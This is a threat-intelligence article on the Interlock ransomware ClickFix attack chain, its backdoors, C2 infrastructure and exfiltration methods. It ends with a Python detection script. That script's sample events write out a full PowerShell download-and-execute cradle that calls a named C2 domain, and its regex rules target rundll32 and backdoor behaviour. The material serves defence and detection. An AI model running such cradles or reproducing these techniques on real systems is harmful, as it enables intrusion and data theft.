Interlock Ransomware Uses ClickFix Exploit to Execute Malicious Commands on Windows
The Interlock ransomware group has been connected to several sophisticated cyber incidents targeting firms in North America and Europe, according to a recent report published in July 2025 by eSentire’s Threat Response Unit (TRU).
The group, active since September 2024, employs a multi-stage attack chain that begins with the exploitation of compromised websites, such as Kongtuke, to redirect victims to ClickFix pages.
This social engineering tactic tricks users into copying and executing malicious PowerShell commands disguised as fixes for technical issues, then displays fake error messages that mask the underlying infection.
Initial Access via Social Engineering
Once executed, the command initiates a download cradle, fetching additional payloads from command-and-control (C2) servers like dng-microsoftds.com, which then fingerprint the system using commands such as systeminfo.
This reconnaissance data is sent back to the C2 for analysis, checking for virtualization or sandbox environments.
If deemed safe, the attack progresses by deploying a “Simple Process Launcher” binary, often named c2.exe, which is persisted via a Windows shortcut in the startup folder and executed through the LOLBin rundll32 using the ShellExec_RunDLL export of shell32.dll.

This launcher spawns further PowerShell processes that download and invoke obfuscated scripts, ultimately installing a PHP interpreter to run a highly obfuscated backdoor stored as config.cfg in the AppData directory.
Multi-Layered Backdoors
The PHP-based backdoor serves as a versatile command handler, supporting operations like executing arbitrary commands via proc_open, downloading and running DLLs or EXEs disguised as PNG files, installing NodeJS for JavaScript payloads such as NodeSnake RAT, and establishing persistence through registry Run keys.
TRU observed Interlock leveraging this backdoor to deploy NodeSnake for data exfiltration, encoding sensitive files in base64 and staging them in C:\Users\Public as .log files, while collecting extensive system details, including drive information, process lists, and network interfaces via PowerShell queries converted to JSON.

Data encryption involves a Mersenne Twister-generated 32-bit XOR key, with iterative XOR operations against plaintext before GZip compression and transmission to dynamically generated C2 URLs featuring random path components.
Following this, a packed C-based backdoor, dropped as a .png file and executed via rundll32, takes over with self-injection techniques to evade detection, incorporating hardcoded C2 servers like 167.235.235.151 and fallback mechanisms storing encrypted backups in %temp%\hiskeow.tmp.

This backdoor facilitates reverse shells by redirecting cmd.exe input/output over TCP 443 sockets, self-deletion using embedded DLLs launched with rundll32, and command execution with output logged to timestamped files in C:\Users\Public.
Commands range from evasion tactics, like freeing memory and sleeping, to updating C2 servers dynamically, with all communications encrypted via seeded rand() XOR keys and prefixed with markers like “55 11 69 DF” for JSON-formatted system fingerprints.
The attack’s complexity is evident in its massive process tree, involving anomalous command lines, LOLBins, and tools for reconnaissance, persistence, and exfiltration, culminating in ransomware deployment.
TRU’s analysis highlights Interlock’s use of custom tooling, including the misnamed “Interlock RAT” functioning primarily as a backdoor with support for nine core commands.
To mitigate such threats, organizations should monitor for suspicious PowerShell executions, unusual rundll32 usage, and unexpected PHP or NodeJS installations, while implementing behavioral detection for social engineering vectors like ClickFix.
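The following is an added illustration of the monitoring advice above, not code from eSentire or the report: a small rule set run over constructed process-creation records (Sysmon Event ID 1 style) that flags the behaviours the article describes. The field names, the sample events and the `Start` export in the .png example are assumptions made for the demonstration.

```python
"""Behavioural checks for the Interlock ClickFix chain. Sample events below are
constructed for illustration, not captured telemetry."""
import re

# Each rule lists regexes that must ALL match the joined "parent | image | cmdline".
RULES = [
    ("PowerShell download cradle (ClickFix paste)",
     [r"powershell", r"Invoke-WebRequest|\biwr\b|DownloadString|Net\.WebClient",
      r"\biex\b|Invoke-Expression"]),
    ("rundll32 launching a binary via shell32 ShellExec_RunDLL",
     [r"rundll32\.exe.*shell32\.dll,\s*ShellExec_RunDLL"]),
    ("PHP interpreter executing config.cfg from AppData",
     [r"php\.exe.*AppData.*config\.cfg"]),
    ("rundll32 loading a .png as a DLL",
     [r"rundll32\.exe\s+\S*\.png\b"]),
    ("Node.js launched from AppData",
     [r"AppData\\[^ |]*node\.exe"]),
]
COMPILED = [(name, [re.compile(p, re.IGNORECASE) for p in pats]) for name, pats in RULES]

def find_suspicious(events):
    """Return (rule_name, cmdline) for every event that satisfies a rule."""
    hits = []
    for ev in events:
        line = f"{ev['parent']} | {ev['image']} | {ev['cmdline']}"
        for name, rxs in COMPILED:
            if all(rx.search(line) for rx in rxs):
                hits.append((name, ev["cmdline"]))
    return hits

# Constructed sample events mirroring the chain: paste -> launcher -> PHP backdoor -> C backdoor.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://dng-microsoftds.com/a -UseBasicParsing)"'},
    {"parent": "powershell.exe", "image": "rundll32.exe",
     "cmdline": 'rundll32.exe shell32.dll,ShellExec_RunDLL "C:\\Users\\Public\\c2.exe"'},
    {"parent": "c2.exe", "image": "php.exe",
     "cmdline": "C:\\Users\\u\\AppData\\Roaming\\php\\php.exe C:\\Users\\u\\AppData\\Roaming\\config.cfg"},
    {"parent": "php.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\image.png,Start"},  # 'Start' export is assumed
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for rule, cmd in find_suspicious(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

In production the same rules would run over real Sysmon or EDR process telemetry; the benign svchost.exe event shows that ordinary system activity passes through untouched.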
eSentire’s TRU emphasizes proactive threat hunting and rapid response, noting that their 24/7 SOC achieves a 15-minute mean time to contain, underscoring the need for managed detection and response services to counter evolving ransomware tactics.
This discovery adds to Interlock’s history of high-profile exploits, reinforcing the importance of layered defenses against identity-based and supply-chain attacks.